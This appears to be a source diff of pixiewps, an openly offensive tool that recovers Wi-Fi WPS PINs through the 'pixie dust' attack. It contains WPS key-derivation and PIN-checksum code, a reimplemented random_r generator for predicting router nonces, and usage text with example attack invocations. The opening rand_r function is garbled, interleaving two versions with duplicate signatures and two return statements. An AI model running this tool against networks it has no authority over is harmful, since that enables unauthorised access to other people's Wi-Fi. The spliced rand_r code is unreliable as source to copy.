dst[len] = (num % (mul * 10) / mul) + '0';
mul *= 10;
}
}
/* Pin checksum computing */
unsigned int wps_pin_checksum(unsigned int pin) {
unsigned int acc = 0;
while (pin) {
acc += 3 * (pin % 10);
pin /= 10;
acc += pin % 10;
pin /= 10;
}
return (10 - acc % 10) % 10;
}
/* Validity PIN control based on checksum */
unsigned int wps_pin_valid(unsigned int pin) {
return wps_pin_checksum(pin / 10) == (pin % 10);
}
/* HMAC-SHA-256 */
void hmac_sha256(const void *key, int key_len, const unsigned char *data, size_t data_len, unsigned char *digest) {
unsigned int h_len = HASH_LEN;
HMAC_CTX ctx;
HMAC_CTX_init(&ctx);
HMAC_Init_ex(&ctx, key, key_len, EVP_sha256(), 0);
HMAC_Update(&ctx, data, data_len);
HMAC_Final(&ctx, digest, &h_len);
HMAC_CTX_cleanup(&ctx);
}
/* Linear congruential generator */
int rand_r(unsigned int *seed) {
unsigned int s = *seed;
unsigned int uret;
int32_t rand_r(uint32_t *seed) {
uint32_t s = *seed;
uint32_t uret;
s = (s * LCG_MULTIPLIER) + LCG_INCREMENT; /* Permutate seed */
uret = s & 0xffe00000; /* Use top 11 bits */
s = (s * LCG_MULTIPLIER) + LCG_INCREMENT; /* Permutate seed */
uret += (s & 0xfffc0000) >> 11; /* Use top 14 bits */
s = (s * LCG_MULTIPLIER) + LCG_INCREMENT; /* Permutate seed */
uret += (s & 0xfe000000) >> (11 + 14); /* Use top 7 bits */
s = (s * 1103515245) + 12345; /* Permutate seed */
uret = s & 0xffe00000; /* Use top 11 bits */
s = (s * 1103515245) + 12345; /* Permutate seed */
uret += (s & 0xfffc0000) >> 11; /* Use top 14 bits */
s = (s * 1103515245) + 12345; /* Permutate seed */
uret += (s & 0xfe000000) >> (11 + 14); /* Use top 7 bits */
*seed = s;
return (int) (uret & RAND_MAX);
return (int32_t) uret;
}
/* Prints a byte array in hexadecimal */
void byte_array_print(unsigned char *buffer, unsigned int length) {
unsigned int i;
for (i = 0; i < length; i++) {
printf("%02x", buffer[i]);
if (i != length - 1) printf(":");
}
}
/* Info usage */
void display_usage() {
puts("");
puts(" Pixiewps made by wiire");
puts("");
puts(" Usage: pixiewps <arguments>");
puts("");
puts(" Required Arguments:");
puts("");
puts(" -e, --pke : Enrollee public key");
puts(" -r, --pkr : Registrar public key");
puts(" -s, --e-hash1 : E-Hash1");
puts(" -z, --e-hash2 : E-Hash2");
puts(" -a, --authkey : Key used in HMAC SHA-256");
puts("");
puts(" Optional Arguments:");
puts("");
puts(" -n, --e-nonce : Enrollee nonce");
puts(" -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)");
puts("");
puts(" -h, --help : Display this usage screen");
puts("");
exit(ARG_ERROR);
}

186
src/pixiewps.h Normal file
View File

@ -0,0 +1,186 @@
/*
* pixiewps: bruteforce the wps pin exploiting the low or non-existing entropy of some APs (pixie dust attack).
* All credits for the research go to Dominique Bongard.
*
* Special thanks to: datahead, soxrok2212
*
* Copyright (c) 2015, wiire <wi7ire@gmail.com>
* Version: 1.1
*
* DISCLAIMER: This tool was made for educational purposes only.
* The author is NOT responsible for any misuse or abuse.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
#ifndef _PIXIEWPS_H
#define _PIXIEWPS_H
#define VERSION "1.1"
#define MAX_MODE 4
#define MODE4_DAYS 10
#define SEC_PER_HOUR 3600
#define SEC_PER_DAY 86400
/* WPS constants */
#define WPS_PUBKEY_LEN 192
#define WPS_HASH_LEN 32
#define WPS_AUTHKEY_LEN 32
#define WPS_EMSK_LEN 32
#define WPS_KEYWRAPKEY_LEN 16
#define WPS_NONCE_LEN 16
#define WPS_SECRET_NONCE_LEN 16
#define WPS_PSK_LEN 16
#define WPS_BSSID_LEN 6
#define WPS_KDF_SALT_LEN 36
/* Exit costants */
#define PIN_ERROR 2
#define MEM_ERROR 3
#define ARG_ERROR 4
#include <openssl/sha.h>
#include <openssl/hmac.h>
typedef enum {false = 0, true = 1} bool;
struct global {
unsigned char *pke;
unsigned char *pkr;
unsigned char *e_hash1;
unsigned char *e_hash2;
unsigned char *authkey;
unsigned char *e_nonce;
unsigned char *r_nonce;
unsigned char *psk1;
unsigned char *psk2;
unsigned char *dhkey;
unsigned char *kdk;
unsigned char *wrapkey;
unsigned char *emsk;
unsigned char *e_s1;
unsigned char *e_s2;
unsigned char *e_bssid;
bool small_dh_keys;
bool bruteforce;
int verbosity;
char *error;
};
char usage[] =
"\n"
" Pixiewps %s WPS pixie dust attack tool\n"
" Copyright (c) 2015, wiire <wi7ire@gmail.com>\n"
"\n"
" Usage: %s <arguments>\n"
"\n"
" Required Arguments:\n"
"\n"
" -e, --pke : Enrollee public key\n"
" -r, --pkr : Registrar public key\n"
" -s, --e-hash1 : Enrollee Hash1\n"
" -z, --e-hash2 : Enrollee Hash2\n"
" -a, --authkey : Authentication session key\n"
"\n"
" Optional Arguments:\n"
"\n"
" -n, --e-nonce : Enrollee nonce (mode 2,3,4)\n"
" -m, --r-nonce : Registrar nonce\n"
" -b, --e-bssid : Enrollee BSSID\n"
" -S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]\n"
" -f, --force : Bruteforce the whole keyspace (mode 4) [No]\n"
" -v, --verbosity : Verbosity level 1-3, 1 is quietest [2]\n"
"\n"
" -h, --help : Display this usage screen\n"
"\n"
" Examples:\n"
"\n"
" pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>\n"
" pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S\n"
" pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S\n"
"%s";
/* SHA-256 */
void sha256(const unsigned char *data, size_t data_len, unsigned char *digest) {
SHA256_CTX ctx;
SHA256_Init(&ctx);
SHA256_Update(&ctx, data, data_len);
SHA256_Final(digest, &ctx);
}
/* HMAC-SHA-256 */
void hmac_sha256(const void *key, int key_len, const unsigned char *data, size_t data_len, unsigned char *digest) {
unsigned int h_len = WPS_HASH_LEN;
HMAC_CTX ctx;
HMAC_CTX_init(&ctx);
HMAC_Init_ex(&ctx, key, key_len, EVP_sha256(), 0);
HMAC_Update(&ctx, data, data_len);
HMAC_Final(&ctx, digest, &h_len);
HMAC_CTX_cleanup(&ctx);
}
/* Key Derivation Function */
void kdf(unsigned char *key, size_t key_len, unsigned char *res) {
uint32_t i = 1;
uint32_t kdk_len = key_len * 8;
int j = 0;
/* Wi-Fi Easy and Secure Key Derivation */
char *salt = "\x57\x69\x2d\x46\x69\x20\x45\x61\x73\x79\x20\x61\x6e\x64\x20\x53\x65\x63\x75\x72\x65\x20\x4b\x65\x79\x20\x44\x65\x72\x69\x76\x61\x74\x69\x6f\x6e";
unsigned char *buffer = malloc(WPS_KDF_SALT_LEN + 4 * 2);
for (i = 1; i < 4; i++) {
uint32_t be = __be32_to_cpu(i);
memcpy(buffer, &be, 4);
memcpy(buffer + 4, salt, WPS_KDF_SALT_LEN);
be = __be32_to_cpu(kdk_len);
memcpy(buffer + 4 + 36, &be, 4);
hmac_sha256(key, WPS_HASH_LEN, buffer, WPS_KDF_SALT_LEN + 4 * 2, res + j);
j += WPS_HASH_LEN;
}
free(buffer);
}
/* Pin checksum computing */
unsigned int wps_pin_checksum(unsigned int pin) {
unsigned int acc = 0;
while (pin) {
acc += 3 * (pin % 10);
pin /= 10;
acc += pin % 10;
pin /= 10;
}
return (10 - acc % 10) % 10;
}
/* Validity PIN control based on checksum */
unsigned int wps_pin_valid(unsigned int pin) {
return wps_pin_checksum(pin / 10) == (pin % 10);
}
#endif /* _PIXIEWPS_H */

365
src/random_r.c Normal file
View File

@ -0,0 +1,365 @@
/*
* Copyright (c) 1983 Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/*
* This is derived from the Berkeley source:
* @(#)random.c 5.5 (Berkeley) 7/6/88
* It was reworked for the GNU C Library by Roland McGrath.
* Rewritten to be reentrant by Ulrich Drepper, 1995
*/
#include <features.h>
#include <limits.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
/* #include <errno.h> */
#include "random_r.h"
/* An improved random number generation package. In addition to the standard
rand()/srand() like interface, this package also has a special state info
interface. The initstate() routine is called with a seed, an array of
bytes, and a count of how many bytes are being passed in; this array is
then initialized to contain information for random number generation with
that much state information. Good sizes for the amount of state
information are 32, 64, 128, and 256 bytes. The state can be switched by
calling the setstate() function with the same array as was initialized
with initstate(). By default, the package runs with 128 bytes of state
information and generates far better random numbers than a linear
congruential generator. If the amount of state information is less than
32 bytes, a simple linear congruential R.N.G. is used. Internally, the
state information is treated as an array of longs; the zeroth element of
the array is the type of R.N.G. being used (small integer); the remainder
of the array is the state information for the R.N.G. Thus, 32 bytes of
state information will give 7 longs worth of state information, which will
allow a degree seven polynomial. (Note: The zeroth word of state
information also has some other information stored in it; see setstate
for details). The random number generation technique is a linear feedback
shift register approach, employing trinomials (since there are fewer terms
to sum up that way). In this approach, the least significant bit of all
the numbers in the state table will act as a linear feedback shift register,
and will have period 2^deg - 1 (where deg is the degree of the polynomial
being used, assuming that the polynomial is irreducible and primitive).
The higher order bits will have longer periods, since their values are
also influenced by pseudo-random carries out of the lower bits. The
total period of the generator is approximately deg*(2**deg - 1); thus
doubling the amount of state information has a vast influence on the
period of the generator. Note: The deg*(2**deg - 1) is an approximation
only good for large deg, when the period of the shift register is the
dominant factor. With deg equal to seven, the period is actually much
longer than the 7*(2**7 - 1) predicted by this formula. */
/* For each of the currently supported random number generators, we have a
break value on the amount of state information (you need at least this many
bytes of state info to support this random number generator), a degree for
the polynomial (actually a trinomial) that the R.N.G. is based on, and
separation between the two lower order coefficients of the trinomial. */
/* Linear congruential. */
#define TYPE_0 0
#define BREAK_0 8
#define DEG_0 0
#define SEP_0 0
/* x**7 + x**3 + 1. */
#define TYPE_1 1
#define BREAK_1 32
#define DEG_1 7
#define SEP_1 3
/* x**15 + x + 1. */
#define TYPE_2 2
#define BREAK_2 64
#define DEG_2 15
#define SEP_2 1
/* x**31 + x**3 + 1. */
#define TYPE_3 3
#define BREAK_3 128
#define DEG_3 31
#define SEP_3 3
/* x**63 + x + 1. */
#define TYPE_4 4
#define BREAK_4 256
#define DEG_4 63
#define SEP_4 1
/* Array versions of the above information to make code run faster.
Relies on fact that TYPE_i == i. */
#define MAX_TYPES 5 /* Max number of types above. */
struct random_poly_info
{
/* smallint seps[MAX_TYPES]; */
/* smallint degrees[MAX_TYPES]; */
unsigned char seps[MAX_TYPES];
unsigned char degrees[MAX_TYPES];
};
static const struct random_poly_info random_poly_info =
{
{ SEP_0, SEP_1, SEP_2, SEP_3, SEP_4 },
{ DEG_0, DEG_1, DEG_2, DEG_3, DEG_4 }
};
/* If we are using the trivial TYPE_0 R.N.G., just do the old linear
congruential bit. Otherwise, we do our fancy trinomial stuff, which is the
same in all the other cases due to all the global variables that have been
set up. The basic operation is to add the number at the rear pointer into
the one at the front pointer. Then both pointers are advanced to the next
location cyclically in the table. The value returned is the sum generated,
reduced to 31 bits by throwing away the "least random" low bit.
Note: The code takes advantage of the fact that both the front and
rear pointers can't wrap on the same call by not testing the rear
pointer if the front one has wrapped. Returns a 31-bit random number. */
void random_r(struct random_data *buf, int32_t *result)
{
int32_t *state;
/* if (buf == NULL || result == NULL) */
/* goto fail; */
state = buf->state;
if (buf->rand_type == TYPE_0)
{
int32_t val = state[0];
val = ((state[0] * 1103515245) + 12345) & 0x7fffffff;
state[0] = val;
*result = val;
}
else
{
int32_t *fptr = buf->fptr;
int32_t *rptr = buf->rptr;
int32_t *end_ptr = buf->end_ptr;
int32_t val;
val = *fptr += *rptr;
/* Chucking least random bit. */
*result = (val >> 1) & 0x7fffffff;
++fptr;
if (fptr >= end_ptr)
{
fptr = state;
++rptr;
}
else
{
++rptr;
if (rptr >= end_ptr)
rptr = state;
}
buf->fptr = fptr;
buf->rptr = rptr;
}
/* return 0; */
/* fail: */
/* __set_errno (EINVAL); */
/* return -1; */
}
/* libc_hidden_def(random_r) */
/* Initialize the random number generator based on the given seed. If the
type is the trivial no-state-information type, just remember the seed.
Otherwise, initializes state[] based on the given "seed" via a linear
congruential generator. Then, the pointers are set to known locations
that are exactly rand_sep places apart. Lastly, it cycles the state
information a given number of times to get rid of any initial dependencies
introduced by the L.C.R.N.G. Note that the initialization of randtbl[]
for default usage relies on values produced by this routine. */
int srandom_r (unsigned int seed, struct random_data *buf)
{
int type;
int32_t *state;
long int i;
long int word;
int32_t *dst;
int kc;
if (buf == NULL)
goto fail;
type = buf->rand_type;
if ((unsigned int) type >= MAX_TYPES)
goto fail;
state = buf->state;
/* We must make sure the seed is not 0. Take arbitrarily 1 in this case. */
if (seed == 0)
seed = 1;
state[0] = seed;
if (type == TYPE_0)
goto done;
dst = state;
word = seed;
kc = buf->rand_deg;
for (i = 1; i < kc; ++i)
{
/* This does:
state[i] = (16807 * state[i - 1]) % 2147483647;
but avoids overflowing 31 bits. */
long int hi = word / 127773;
long int lo = word % 127773;
word = 16807 * lo - 2836 * hi;
if (word < 0)
word += 2147483647;
*++dst = word;
}
buf->fptr = &state[buf->rand_sep];
buf->rptr = &state[0];
kc *= 10;
while (--kc >= 0)
{
int32_t discard;
(void) random_r (buf, &discard);
}
done:
return 0;
fail:
return -1;
}
/* libc_hidden_def(srandom_r) */
/* Initialize the state information in the given array of N bytes for
future random number generation. Based on the number of bytes we
are given, and the break values for the different R.N.G.'s, we choose
the best (largest) one we can and set things up for it. srandom is
then called to initialize the state information. Note that on return
from srandom, we set state[-1] to be the type multiplexed with the current
value of the rear pointer; this is so successive calls to initstate won't
lose this information and will be able to restart with setstate.
Note: The first thing we do is save the current state, if any, just like
setstate so that it doesn't matter when initstate is called.
Returns a pointer to the old state. */
int initstate_r (unsigned int seed, char *arg_state, size_t n, struct random_data *buf)
{
int type;
int degree;
int separation;
int32_t *state;
if (buf == NULL)
goto fail;
if (n >= BREAK_3)
type = n < BREAK_4 ? TYPE_3 : TYPE_4;
else if (n < BREAK_1)
{
if (n < BREAK_0)
{
/* __set_errno (EINVAL); */
goto fail;
}
type = TYPE_0;
}
else
type = n < BREAK_2 ? TYPE_1 : TYPE_2;
degree = random_poly_info.degrees[type];
separation = random_poly_info.seps[type];
buf->rand_type = type;
buf->rand_sep = separation;
buf->rand_deg = degree;
state = &((int32_t *) arg_state)[1]; /* First location. */
/* Must set END_PTR before srandom. */
buf->end_ptr = &state[degree];
buf->state = state;
srandom_r (seed, buf);
state[-1] = TYPE_0;
if (type != TYPE_0)
state[-1] = (buf->rptr - state) * MAX_TYPES + type;
return 0;
fail:
/* __set_errno (EINVAL); */
return -1;
}
/* libc_hidden_def(initstate_r) */
/* Restore the state from the given state array.
Note: It is important that we also remember the locations of the pointers
in the current state information, and restore the locations of the pointers
from the old state information. This is done by multiplexing the pointer
location into the zeroth word of the state information. Note that due
to the order in which things are done, it is OK to call setstate with the
same state as the current state
Returns a pointer to the old state information. */
int setstate_r (char *arg_state, struct random_data *buf)
{
int32_t *new_state = 1 + (int32_t *) arg_state;
int type;
int old_type;
int32_t *old_state;
int degree;
int separation;
if (arg_state == NULL || buf == NULL)
goto fail;
old_type = buf->rand_type;
old_state = buf->state;
if (old_type == TYPE_0)
old_state[-1] = TYPE_0;
else
old_state[-1] = (MAX_TYPES * (buf->rptr - old_state)) + old_type;
type = new_state[-1] % MAX_TYPES;
if (type < TYPE_0 || type > TYPE_4)
goto fail;
buf->rand_deg = degree = random_poly_info.degrees[type];
buf->rand_sep = separation = random_poly_info.seps[type];
buf->rand_type = type;
if (type != TYPE_0)
{
int rear = new_state[-1] / MAX_TYPES;
buf->rptr = &new_state[rear];
buf->fptr = &new_state[(rear + separation) % degree];
}
buf->state = new_state;
/* Set end_ptr too. */
buf->end_ptr = &new_state[degree];
return 0;
fail:
/* __set_errno (EINVAL); */
return -1;
}
/* libc_hidden_def(setstate_r) */

60
src/random_r.h Normal file
View File

@ -0,0 +1,60 @@
/*
* pixiewps: bruteforce the wps pin exploiting the low or non-existing entropy of some APs (pixie dust attack).
* All credits for the research go to Dominique Bongard.
*
* Special thanks to: datahead, soxrok2212
*
* Copyright (c) 2015, wiire <wi7ire@gmail.com>
* Version: 1.1
*
* DISCLAIMER: This tool was made for educational purposes only.
* The author is NOT responsible for any misuse or abuse.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
#ifndef _RANDOM_R_H
#define _RANDOM_R_H
#include <stdint.h>
struct random_data {
int32_t *fptr; /* Front pointer */
int32_t *rptr; /* Rear pointer */
int32_t *state; /* Array of state values */
int rand_type; /* Type of random number generator */
int rand_deg; /* Degree of random number generator */
int rand_sep; /* Distance between front and rear */
int32_t *end_ptr; /* Pointer behind state table */
};
void random_r(struct random_data *buf, int32_t *result);
int srandom_r (unsigned int seed, struct random_data *buf);
int initstate_r (unsigned int seed, char *arg_state, size_t n, struct random_data *buf);
int setstate_r (char *arg_state, struct random_data *buf);
#endif /* _RANDOM_R_H */

109
src/utils.h Normal file
View File

@ -0,0 +1,109 @@
/*
* pixiewps: bruteforce the wps pin exploiting the low or non-existing entropy of some APs (pixie dust attack).
* All credits for the research go to Dominique Bongard.
*
* Special thanks to: datahead, soxrok2212
*
* Copyright (c) 2015, wiire <wi7ire@gmail.com>
* Version: 1.1
*
* DISCLAIMER: This tool was made for educational purposes only.
* The author is NOT responsible for any misuse or abuse.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. If you
* do not wish to do so, delete this exception statement from your
* version. If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
#ifndef _UTILS_H
#define _UTILS_H
/* Converts an hex string to a byte array */
int hex_string_to_byte_array(char *in, unsigned char *out, int n_len) {
int i, j, o;
int len = strlen(in);
int b_len = n_len * 2 + n_len - 1;
if (len != n_len * 2 && len != b_len)
return 1;
for (i = 0; i < n_len; i++) {
o = 0;
for (j = 0; j < 2; j++) {
o <<= 4;
if (*in >= 'A' && *in <= 'F')
*in += 'a'-'A';
if (*in >= '0' && *in <= '9')
o += *in - '0';
else
if (*in >= 'a' && *in <= 'f')
o += *in - 'a' + 10;
else
return 1;
in++;
};
*out++ = o;
if (len == b_len) {
if (*in == ':' || *in == '-' || *in == ' ' || *in == 0)
in++;
else
return 1;
}
}
return 0;
};
/* Converts a string into an integer */
int get_int(char *in, int *out) {
int i, o = 0, len = strlen(in);
for (i = 0; i < len; i++) {
if ('0' <= *in && *in <= '9')
o = o * 10 + *in - '0';
else
return 1;
in++;
};
*out = o;
return 0;
};
/* Converts an unsigned integer to a char array without termination */
void uint_to_char_array(unsigned int num, int len, unsigned char *dst) {
unsigned int mul = 1;
while (len--) {
dst[len] = (num % (mul * 10) / mul) + '0';
mul *= 10;
}
}
/* Prints a byte array in hexadecimal */
void byte_array_print(unsigned char *buffer, unsigned int length) {
unsigned int i;
for (i = 0; i < length; i++) {
printf("%02x", buffer[i]);
if (i != length - 1) printf(":");
}
}
#endif /* _UTILS_H */